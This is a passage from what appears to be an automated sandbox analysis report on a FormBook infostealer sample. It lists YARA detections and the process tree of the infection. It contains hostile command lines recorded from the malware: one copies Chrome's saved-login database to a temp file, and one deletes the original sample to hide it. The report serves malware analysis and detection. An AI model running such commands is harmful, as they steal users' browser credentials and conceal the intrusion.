yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmmon32.exePID: 6696, Parent PID: 684

General

Target ID:	11
Start time:	21:08:10
Start date:	21/06/2022
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmmon32.exe
Imagebase:	0x200000
File size:	36864 bytes
MD5 hash:	2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exePID: 6848, Parent PID: 6696

General

Target ID:	13
Start time:	21:08:17
Start date:	21/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\e6o7hKFmfC.exe"
Imagebase:	0x1100000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exePID: 4908, Parent PID: 6848

General

Target ID:	14
Start time:	21:08:18
Start date:	21/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exePID: 6716, Parent PID: 6696

General

Target ID:	20
Start time:	21:08:59
Start date:	21/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Imagebase:	0x1100000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exePID: 6688, Parent PID: 6716

General

Target ID:	21
Start time:	21:09:00
Start date:	21/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high